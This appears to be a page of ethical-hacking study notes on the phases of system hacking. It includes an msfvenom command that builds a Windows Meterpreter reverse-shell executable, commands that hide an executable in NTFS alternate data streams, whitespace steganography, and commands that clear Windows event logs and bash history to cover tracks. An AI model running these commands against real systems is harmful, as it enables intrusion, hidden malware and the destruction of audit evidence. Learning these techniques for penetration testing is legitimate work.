Skip to content

🖥️ System Hacking

System hacking is the process of gaining unauthorized access to a target’s systems and applications.

Gaining access is the process of exploiting vulnerabilities in a target’s systems and applications to gain unauthorized access.

Metasploit is a penetration testing framework that allows security professionals to find and exploit vulnerabilities in systems and applications.

Terminal window
# Generate a reverse tcp payload for Windows
msfvenom -p windows/meterpreter/reverse_tcp --platform windows \
-a x86 -o file.exe LHOST=YOUR_IP LPORT=YOUR_PORT

Exploit sites are repositories of information about known vulnerabilities in software and hardware.

Privilege escalation is the process of gaining higher privileges on a target’s system or application.

Post-exploitation is the process of maintaining access to a target’s system or application after gaining unauthorized access.

NTFS streams are a feature of the NTFS file system that allows files to contain multiple streams of data.

This can be used to hide data within a file without altering its size or appearance.

Terminal window
# Create a file with an alternate data stream
echo "This is a hidden message" > file.txt:stream
# Insert a file as an alternate data stream
type exploit.exe > file.txt:file.exe

White space stenography is the process of hiding data by using white space characters in a file.

Terminal window
snow -C -m "I am lying" -p "hello world" input.txt output.txt

Image steganography is the process of hiding data within an image file.

Clear logs is the process of deleting or modifying logs on a target’s system or application to cover tracks.

Terminal window
# Clear logs using auditpol
# https://learn.microsoft.com/it-it/windows-server/administration/windows-commands/auditpol
auditpol /clear /y
# Clear logs using wevtutil
# https://learn.microsoft.com/it-it/windows-server/administration/windows-commands/wevtutil
wevtutil cl System
wevtutil cl Application
# ...
# Encrypt deleted data using cipher
# https://learn.microsoft.com/it-it/windows-server/administration/windows-commands/cipher
cipher /w:C:
Terminal window
# Disable bash history
export HISTSIZE=0
# Clear bash history
history -c # all
history -w # current session
# Shred a file making it unrecoverable
shred file.txt